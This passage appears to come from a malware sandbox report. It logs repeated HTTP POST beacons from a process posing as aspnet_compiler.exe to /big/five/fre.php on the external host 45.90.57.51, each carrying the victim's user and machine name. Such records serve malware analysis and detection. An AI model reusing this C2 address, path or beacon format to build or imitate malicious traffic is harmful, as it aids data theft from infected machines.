May 16, 2024 00:37:11.574807882 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:37:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49723	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:37:12.990169048 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:37:13.233370066 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:37:13.504816055 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:37:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49724	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:37:14.907253027 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:37:15.150247097 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:37:15.418884993 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:37:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49725	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:37:16.803035021 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:37:17.045828104 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:37:17.315321922 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:37:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49726	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:37:18.705945969 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:37:18.948765039 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:37:19.223879099 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:37:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49727	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:37:20.628599882 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:37:20.870028019 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:37:21.133209944 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:37:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49728	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:37:23.884685040 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:37:24.117247105 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:37:24.372669935 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:37:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49729	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:37:25.750611067 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:37:25.991564989 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:37:26.257152081 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:37:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49730	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:37:27.656502008 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:37:27.895728111 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:37:28.165565014 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:37:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49731	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:37:29.556037903 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:37:29.789896965 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:37:30.052185059 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:37:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49732	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:37:31.431993008 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:37:31.666939974 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:37:31.926841974 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:37:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49733	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:37:33.315004110 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:37:33.557179928 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:37:33.823352098 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:37:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49734	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:37:35.199754953 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:37:35.435014009 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:37:35.696424961 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:37:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49735	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:37:37.130220890 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:37:37.370995998 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:37:37.637985945 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:37:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49736	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:37:39.020338058 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:37:39.263248920 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:37:39.532387972 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:37:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49737	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:37:41.744488001 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:37:41.979351997 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:37:42.248025894 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:37:42 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49738	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:37:43.623424053 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:37:43.856988907 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:37:44.125783920 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:37:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49739	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:37:45.530427933 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:37:45.770276070 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:37:46.034174919 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:37:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49740	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:37:47.452852011 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:37:47.692492962 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:37:47.955065966 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:37:47 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49742	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:37:49.343816996 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:37:49.584079027 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:37:49.847440958 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:37:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49743	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:37:51.232609987 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:37:51.472027063 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:37:51.736666918 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:37:51 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49744	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:37:53.120054960 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
